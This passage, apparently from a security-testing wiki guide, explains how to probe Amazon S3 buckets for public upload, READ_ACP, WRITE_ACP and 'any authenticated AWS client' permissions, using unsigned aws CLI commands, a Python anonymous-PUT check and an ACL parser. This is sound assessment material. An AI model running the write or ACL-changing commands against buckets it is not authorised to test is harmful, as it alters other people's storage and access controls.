A bucket that allows arbitrary file upload will answer with a message showing that the file has been uploaded, such as the following:

```
upload: localfile to s3://[bucketname]/file.txt
```

'''Note:''' the `--no-sign-request` flag specifies not to use credentials to sign the request.
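The same write test can also be performed over plain HTTP with an unsigned PUT request. A sketch, assuming the standard S3 behaviour (200 when anonymous WRITE is granted, 403 when it is denied); the function names are illustrative:

```python
import urllib.error
import urllib.request

def classify_write(status):
    """Interpret the HTTP status of an unsigned PUT against an object URL."""
    if status == 200:
        return "writable"        # anonymous WRITE granted at bucket level
    if status == 403:
        return "access denied"   # bucket exists, anonymous WRITE denied
    if status == 404:
        return "no such bucket"
    return "unknown"

def try_anonymous_put(bucketname, key, data=b"test"):
    """Attempt an unsigned PUT of a small test object into the bucket."""
    url = f"https://{bucketname}.s3.amazonaws.com/{key}"
    req = urllib.request.Request(url, data=data, method="PUT")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify_write(resp.status)
    except urllib.error.HTTPError as e:
        return classify_write(e.code)
```

Remember to remove any uploaded test object once the assessment is complete.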
==== READ_ACP Permission ====
Via the `aws` command line tool it is possible to test the `READ_ACP` permission for both an S3 bucket (`aws s3api get-bucket-acl`, documentation: https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html) and single objects (`aws s3api get-object-acl`, documentation: https://docs.aws.amazon.com/cli/latest/reference/s3api/get-object-acl.html).

Testing a bucket for `READ_ACP`:

```
aws s3api get-bucket-acl --bucket [bucketname] --no-sign-request
```

Testing a single object for `READ_ACP`:

```
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request
```

Both commands output a JSON document showing the ACL policies for the specified resource.

'''Note:''' the `--no-sign-request` flag specifies not to use credentials to sign the request.
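The JSON returned by these commands can be inspected programmatically for dangerous grants. A minimal sketch: the `AllUsers` and `AuthenticatedUsers` group URIs are the standard AWS identifiers for anonymous and any-authenticated access, while the sample document and the helper name are illustrative:

```python
import json

# Standard AWS group URIs for anonymous and any-authenticated access
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def public_grants(acl_json):
    """Return (grantee URI, permission) pairs granted to public groups."""
    acl = json.loads(acl_json)
    findings = []
    for grant in acl.get("Grants", []):
        uri = grant.get("Grantee", {}).get("URI")
        if uri in PUBLIC_GRANTEES:
            findings.append((uri, grant.get("Permission")))
    return findings

if __name__ == "__main__":
    # Illustrative ACL document in the shape returned by get-bucket-acl
    sample = json.dumps({
        "Owner": {"ID": "abc"},
        "Grants": [
            {"Grantee": {"Type": "Group",
                         "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
             "Permission": "READ"},
        ],
    })
    print(public_grants(sample))
```

Any pair returned by `public_grants` indicates a permission exposed to the public or to all AWS accounts.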
==== WRITE_ACP Permission ====
Via the `aws` command line tool it is possible to test the `WRITE_ACP` permission for both an S3 bucket (`aws s3api put-bucket-acl`, documentation: https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-acl.html) and single objects (`aws s3api put-object-acl`, documentation: https://docs.aws.amazon.com/cli/latest/reference/s3api/put-object-acl.html).

Testing a bucket for `WRITE_ACP`:

```
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
```

Testing a single object for `WRITE_ACP`:

```
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request
```

Neither command displays any output when the operation succeeds.

'''Note:''' the `--no-sign-request` flag specifies not to use credentials to sign the request.
==== Any authenticated AWS client ====
Finally, S3 permissions used to include a peculiar grant named "any authenticated AWS client". This grant allows any AWS account holder, regardless of identity, to access the bucket. It can no longer be configured, but there are still buckets that have it enabled.
To test for this type of permission, create an AWS account and configure it locally with the `aws` command line tool:

```
aws configure
```

Then try to access the bucket with the same commands described above; the only difference is that the `--no-sign-request` flag should be replaced with `--profile [PROFILENAME]`, where `[PROFILENAME]` is the name of the profile created with the `configure` command.
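When scripting these checks, the only thing that changes between the anonymous and the authenticated run is the trailing flag. A tiny sketch of that swap; `with_auth` is a hypothetical helper name, not part of the aws CLI:

```python
def with_auth(cmd, profile=None):
    """Append --no-sign-request, or --profile [PROFILENAME] when a
    named profile is given, to an aws CLI command (as an argv list)."""
    if profile is None:
        return list(cmd) + ["--no-sign-request"]
    return list(cmd) + ["--profile", profile]

if __name__ == "__main__":
    base = ["aws", "s3", "ls", "s3://[bucketname]"]
    print(" ".join(with_auth(base)))                     # anonymous run
    print(" ".join(with_auth(base, profile="pentest")))  # authenticated run
```

Running every permission test twice, once per variant, distinguishes buckets open to everyone from buckets open only to "any authenticated AWS client".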
== External Resources ==
This is a collection of additional external resources related to testing S3 buckets.

* My arsenal of AWS security tools (https://blyx.com/2018/07/18/my-arsenal-of-aws-security-tools/)
* My Arsenal of Cloud Native (Security) Tools (https://www.marcolancini.it/2018/blog-arsenal-cloud-native-security-tools/)
* AWS Security Checks (https://github.com/PortSwigger/aws-security-checks)
* boto: A Python interface to Amazon Web Services (http://boto.cloudhackers.com/en/latest/)
* AWS Extender (https://github.com/VirtueSecurity/aws-extender)
* RhinoSecurityLabs aws-pentest-tools (https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools)